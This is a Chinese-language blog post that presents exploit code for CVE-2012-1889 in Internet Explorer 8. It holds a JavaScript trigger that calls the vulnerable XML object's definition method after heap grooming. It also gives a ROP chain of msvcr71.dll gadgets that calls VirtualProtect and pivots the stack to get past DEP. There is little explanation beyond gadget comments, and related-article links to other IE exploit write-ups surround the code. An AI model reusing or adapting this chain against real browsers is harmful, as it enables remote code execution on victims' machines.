cve2012-1889 ie8 rop

最新推荐文章于 2023-04-10 15:46:12 发布
最新推荐文章于 2023-04-10 15:46:12 发布
阅读量1.2k 收藏
点赞数
分类专栏: 漏洞利用 文章标签: ie c function oo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/instruder/article/details/7675089
版权



采用inking 大牛的方法

function exploit()
{


obj = document.getElementById('oo').object;

var src = unescape("%u0c0c%u0c0c");

while (src.length < 0x1002) src += src;

src = "\\\\xxx" + src;

src = src.substr(0, 0x1000 - 10);

var pic = document.createElement("img");

pic.src = src;

pic.nameProp;


obj.definition(1);

}

采用  https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/#IE6_UserSize_0x7ffe0 上面的喷射方法,准确定位0c0c0c0c


rop模块

		var rop = unescape("%u0bfc%u0c0c");  // get ecx  mov ecx,[eax]  call ecx+18
		rop+=unescape("%u6402%u7c37"); // POP EBP // RETN [msvcr71.dll] 跳过下面的
		rop+=unescape("%u24e5%u7c34");// // POP EBP  MOV EAX,1 POP EBP POP EDI POP ESI  POP EBX MOV ESP,EBP POP EBP retn  change stack point
		
		// 开始正式ROP   
		rop+=unescape("%u6402%u7c37");// POP EBP // RETN [msvcr71.dll]
		rop+=unescape("%u6402%u7c37");// POP EBP // RETN [msvcr71.dll]
	 	rop+=unescape("%u7f97%u7c34");  // POP EAX // RETN [msvcr71.dll]
                rop+=unescape("%uf800%uffff");  // Value to negate, will become %u00000201 (dwSize)
                rop+=unescape("%u1e05%u7c35");  // NEG EAX // RETN [msvcr71.dll]
                rop+=unescape("%u4901%u7c35");  // POP EBX // RETN [msvcr71.dll]
                rop+=unescape("%uffff%uffff");
                rop+=unescape("%u5255%u7c34");  // INC EBX // FPATAN // RETN [msvcr71.dll]
                rop+=unescape("%u2174%u7c35");  // ADD EBX,EAX // XOR EAX,EAX // INC EAX // RETN [msvcr71.dll]
                rop+=unescape("%u4f87%u7c34");  // POP EDX // RETN [msvcr71.dll]
                rop+=unescape("%uffc0%uffff");  // Value to negate, will become %u00000040
                rop+=unescape("%u1eb1%u7c35");  // NEG EDX // RETN [msvcr71.dll]
                rop+=unescape("%ud201%u7c34");  // POP ECX // RETN [msvcr71.dll]
               	rop+=unescape("%ub001%u7c38");  // &Writable location [msvcr71.dll]
                rop+=unescape("%ub8d7%u7c34");  // POP EDI // RETN [msvcr71.dll]
                rop+=unescape("%u7f98%u7c34");  // RETN (ROP NOP) [msvcr71.dll]
                rop+=unescape("%u4802%u7c36");  // POP ESI // RETN [msvcr71.dll]
                rop+=unescape("%u15a2%u7c34");  // JMP [EAX] [msvcr71.dll]
                rop+=unescape("%u7f97%u7c34");  // POP EAX // RETN [msvcr71.dll]
                rop+=unescape("%ua151%u7c37");  // ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
                rop+=unescape("%u8c81%u7c37");  // PUSHAD // ADD AL,0EF // RETN [msvcr71.dll]
                rop+=unescape("%u5c30%u7c34");  // ptr to 'push esp //  ret ' [msvcr71.dll]




instruder
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞分析之CVE-2012-4792(UAF)
4ct10n
06-29 2468
0x00 漏洞简介 2012年9月,通用漏洞与披露平台发布了一个存在IE浏览器的UAF漏洞。 报告指出:Microsoft Internet Explorer 6至9版本中的mshtml.dll中的CMshtmlEd::Exec函数中存在释放后使用漏洞。远程攻击者可利用该漏洞通过特制的网站,执行任意代码。 0x01 测试环境操作系统:Windows XP sp3浏览器:IE 8.00.6
CVE-2012-1889漏洞利用
enjoy5512的博客
09-25 3732
ROP技术绕过DEP保护 Heap Spray技术绕过ASLR保护 CVE-2012-1889
深入探讨ROP 载荷分析
omnispace的博客
03-29 1661
0x00 简介 Exploit-db上看到的感觉还不错,所以就翻译一下,原文题目为《Deep Dive into ROP Payload Analysis》,作者Sudeep Singh。 这篇文章的主要目的是介绍漏洞利用中的ROP载荷的分析技术,同时也深入分析一种ROP缓解技术stack pivot检测技术,该技术目前被用于防护软件中。 通过分析之前发现的两个攻击样本(CVE-2010
Internet Explorer(CVE-2012-1889)暴雷漏洞分析报告【Win7&IE8版】
精彩的艺术
02-28 605
软件名称:Internet Explorer 软件版本:8.0 漏洞模块:msxml3.dll 模块版本:8.90.1101.0 编译日期:2008年4月14日 操作环境:Win7 x86 sp1/JRE 6.0 漏洞编号:CVE-2012-1889(MS12-043) 危害等级:超危 漏洞类型:缓冲区溢出 威胁类型:远程 1. 软件简介 In
暴雷漏洞 (CVE-2012-1889)漏洞分析报告
weixin_44681749的博客
04-10 601
暴雷漏洞分析利用&PoC&Exp
WIN7_64 + CVE-2012-1889的分析
nethm的专栏
09-23 589
一 直接运行网上的POC 网页    双击cve-2012-1889-test-poc.html,发现IE崩溃了,此时的崩溃信息如下:   应用程序版本: 8.0.7601.17514   应用程序时间戳: 4ce79912   故障模块名称: msxml3.dll   故障模块版本: 8.110.7601.17514   故障模块时间戳: 4ce7b8e9   异常代码:
IE UAF 漏洞(CVE-2012-4969)漏洞分析与利用
giantbranch的专栏
04-05 5279
简介 这是一个UAF的漏洞 实验环境 Windows 7 Sp1 32位 IE 8 windbg IDA mona 漏洞分析 搜了一下metasploit那里有,于是就直接生成exp咯 msf > search CVE-2012-4969 Matching Modules ================ Name
CVE-2012-1876 Internet Exporter堆溢出漏洞分析
鬼手的博客
08-16 1898
文章目录漏洞描述IE浏览器组件介绍分析环境POC漏洞分析漏洞利用参考资料 漏洞描述 该IE浏览器漏洞的成因在mshtml.dll这个模块的CTableLayout::CalculateMinMax函数里,程序在执行时会以HTML代码中的元素span属性作为循环控制次数向堆中写入数据。如果此span值设置不当,那么就会引发堆溢出问题。 IE浏览器组件介绍 Internet Explorer体系结构的...
CVE-2012-1889(暴雷)漏洞分析
datouyu0824的博客
03-21 1393
1. 软件简介 IExplorer为微软公司开发的浏览器。 Microsoft XML Core Services(MSXML)微软XML分析程序是一组用于用Jscript、VBScript、Microsoft开发工具编写构筑基于XML的Windows-native应用的服务,用于处理XML中可扩展样式表语言(XSLT)。XML分析程序基于微软的元件对象模型(COM),它实质上是XML语法分析器和XPath处理器的应用编程接口(API)。语法分析器将XML数据组织成树状结构以便于处理,处理器将XML转换
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
Oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip 是一个针对Oracle数据库系统的重要安全更新。这个补丁主要解决了一个在Oracle 11.2.0.1版本中的严重安全漏洞,该漏洞被标记为CVE-2012-1675...
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)的解决文档
05-25
链接:http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html 根据此链接得到解决方法: ? 1234 SolutionRecommendations for protecting against this vulnerability can be found ...
CVE-2012-0158的POC
04-18
这是office安全漏洞的一个POC,用来帮助分析理解漏洞原理。
Oracle Database Server ‘TNS Listener’远程数据投毒漏洞(CVE-2012-1675)的完美解决方法
12-16
应用最新bundle patch后,扫描依然报出漏洞 Oracle Database Server ‘TNS Listener’远程数据投毒漏洞(CVE-2012-1675) •1.确定解决方案 •2.应用解决方案 •3.验证修补情况 •4.Reference 1.确定解决方案 ...
ms10_046_shortcut_icon_dllloader 这个其实很好用
爱杀之爪的矩阵
04-08 3742
Well-known DEP-violating thunks
爱杀之爪的矩阵
04-10 3572
这几天调试发现一个奇怪的现象,一个在数据区段执行的指令,在开启了系统dep时 竟然还可以继续执行,换成其他指令就不可以,而且执行时这个内存属性仍旧是不可 执行属性。同时按理指令是一条一条执行,但是这个指令的执行是跳跃了,瞬间差点毁了 多年的指令执行三观。 debug win7+system dep open Breakpoint 0 hit eax=2e81e
cve-2012-1876 win7_ie8_leak_shellcode code
爱杀之爪的矩阵
08-08 2917
alert("begin") //var div_container = document.getElementById("test"); //div_container.style.cssText = "display:none"; var cloned = new Array(); var selob = document.createElement("select"); selob.w0
MSVCRT:ROP - CN 修改ROP检测标志
爱杀之爪的矩阵
04-08 2424
function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn kkkkk += unescape("\uf519\u77be")////pop ecx,retn kkkkk += unescape("\u9ef8\u1009
cve-2012-1675
最新发布
01-31
cve-2012-1675是指微软在2012年发现的一个针对Windows操作系统的安全漏洞。这个漏洞涉及到Windows Common Control库中的一个错误,可以被远程攻击者利用来执行恶意代码。具体来说,当用户访问一个包含恶意制作的缩略...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值